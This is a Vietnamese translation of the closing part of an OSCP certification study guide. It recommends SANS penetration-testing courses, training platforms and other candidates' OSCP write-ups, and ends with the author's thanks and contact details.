SANS cung cấp rất nhiều khóa học về bảo mật thông tin. Mỗi khóa học của họ đều được giảng dạy bởi những giảng viên rất thông minh đã làm trong lĩnh vực này rất lâu. Tuy nhiên, những khóa học này có thể tốn kém nếu bạn không thể nhờ ai đó trả tiền cho chúng. Bạn cũng có thể thử đăng ký khóa đào tạo lực lượng lao động của SANS để có thể tham gia các khóa học của họ với mức giá ưu đãi. Tôi đã tham gia hầu hết khóa học của SANS và tôi cảm thấy rằng các khóa học tiếp theo bên dưới thực sự đã giúp tôi hiểu rõ hơn về Pentesting là như thế nào trong lĩnh vực thực tế. Dưới đây là các khóa học mà tôi muốn giới thiệu nếu bạn đang muốn chuẩn bị cho OSCP.
- SANS 560: https://www.sans.org/course/network-penetration-testing-ethical-hacking
- SANS 542: https://www.sans.org/course/web-app-penetration-testing-ethical-hacking
Pentesterlabs: Rất nhiều tài liệu về ứng dụng web trong khóa học này: https://pentesterlab.com/
Học viện Pentester: https://www.pentesteracademy.com/topics
Học viện An ninh Web: https://portswigger.net/web-security
Các hướng dẫn OSCP khác:
- https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
- https://411hall.github.io/OSCP-Preparation
- https://www.gitbook.com/book/sushant747/total-oscp-guide
- http://0xc0ffee.io/blog/OSCP-Goldmine
- https://h4ck.co/oscp-journey-exam-lab-prep-tips/
- https://tulpa-security.com/2016/09/11/review-oscp-and-pwk/
- http://niiconsults.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/
- https://ranakhalil101.medium.com/my-oscp-journey-a-review-fa779b4339d9
- https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/
Các liên kết khác:
- https://practicalpentestlabs.com/
- https://immersivelabs.co.uk/
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Phần kết luận:
Vậy thì! Có vẻ như bạn đã đi đến cuối hành trình này (cũng không phải là hành trình OSCP của bạn nếu bạn quyết định theo đuổi nó!). Nếu bạn đọc toàn bộ hướng dẫn này, tôi chắc chắn sẽ cung cấp cho bạn các đạo cụ để làm như vậy. Nếu bạn chỉ đọc một phần của nó, thì tôi vẫn cung cấp cho bạn phần thưởng vì điều quan trọng đối với tôi là bạn đã học được điều gì đó từ nó!
Tôi hy vọng bạn có thể sử dụng hướng dẫn của tôi trong hành trình OSCP của bạn và có thể học được một số điều mới, giống như tôi đã làm khi bắt đầu làm việc. Nếu hướng dẫn này có thể giúp bạn, hãy cho tôi biết tôi muốn phản hồi của bạn chắc chắn. Tôi cảm ơn rất nhiều người đã giúp tôi trong hành trình của tôi trong hướng dẫn này và tôi muốn cảm ơn một lần nữa họ vì thời gian và những đóng góp của họ đã giúp tôi học hỏi và phát triển trong lĩnh vực an ninh mạng.
Nếu bất kỳ ai có bất kỳ câu hỏi nào về hướng dẫn này hoặc phản hồi, vui lòng cho tôi biết vì bạn có thể liên hệ với tôi trên twitter, discord hoặc trên NetSecFocus!
TJ Null
- Twitter: https://twitter.com/TJ_Null
- Github: https://github.com/tjnull
- Netsec Focus: Tjnull
- Bất hòa:
Tjnull#1788
Biên tập : CEHVIETNAM